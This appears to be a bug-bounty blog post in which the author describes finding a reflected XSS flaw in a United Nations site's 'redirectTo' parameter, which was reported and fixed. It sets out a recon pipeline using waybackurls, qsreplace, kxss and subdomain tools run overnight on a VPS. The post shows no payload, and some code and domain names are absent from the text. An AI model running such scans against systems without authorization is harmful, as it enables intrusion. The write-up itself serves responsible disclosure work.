How I made it into the United Nations hall of fame as I slept

4 min readMay 25, 2022


This article is going to be about how I got my name in the United Nations hall of fame for finding a reflected XSS bug as I slept.

If you are a beginner in bug hunting you must've read a ton of articles for understanding XSS bugs and finding them. Me too!

The classic methodology to find them is…

  1. collect all the URLs from ‘waybackurls’ or ‘gau’
  2. select all the links that require parameters(have ‘=’ in them)
  3. parse all the links to ‘kxss’ and look for the links that dont unfilter characters like <,>,”,’
  4. target those links and try to inject code on those parameters(for the basic methodology of finding XSS read

Using all these points to form a one-liner(‘qsreplace’ here helps in parsing the unique links to kxss and saveing time)…

waybackurls | grep = | qsreplace test | kxss

But the basic methodology is a little longer(collecting all alive domains, taking screenshots etc).

Recon tasks like this are long and boring and I always spent the first half-hour of hunting, where my concentration is at its max to run such boring and repetitive tasks. Also, a lot of long scans would be interrupted due to problems like the network and battery.

Setting up a Virtual Private Server

The solutions to these problems were quite easy. To solve the 2nd problem, I decided to use a VPS from Digital Ocean. I set up a Linux server and installed the necessary tools. Ran the commands inside a ‘tmux’ pane so that my sessions would be saved even if I log out.

Weaponising Waybackurls

As I ran waybackurls on the target, I noticed something very weird about the tool.

Case 1: If I run waybackurls on for all the subs I get web archive links for that domain from all the subdomain.

>> waybackurls

In the example you see above I get only 2 results from ‘’ but in case 2…

Case 2: Running ‘waybackurls’ only on ‘’

>> waybackurls

I realised that I get more results for a given subdomain if I give it separately to the tool. This meant that to increase my attack surface, I must run waybackurls on every subdomain. It is not like I have the patience to do that, so I decided to code a script for it.

5-minute code to get the links from all domains(try threading to speed up the process)

I added this code along with some other code to collect domains from tools like ‘subfinder’, ‘amass’ and ‘findomain’. Then to extract all the alive domains from ‘http’, then use that list to give to the ‘recursive_wayback()’. Once the list was created I piped it to ‘kxss’. Once I had the list of all the URLs with their list of unfiltered characters, I was free to look for points vulnerable to reflected XSS.

Finding XSS

I started the scan before I went to sleep. When I woke after ̶8̶ 6 hours the report was ready.

Simple grep to instantly find vulnerable parameters

Once I found that the ‘redirectTo’ parameter doesn't filter <,>,”,’, I knew I could trigger an XSS vulnerability.


Reported: 16th April 2022

Fixed: 21st April 2022

Acknowledged: 25th April 2022



If you enjoyed the blog, feel free to clap and follow me on Twitter.

Thank you.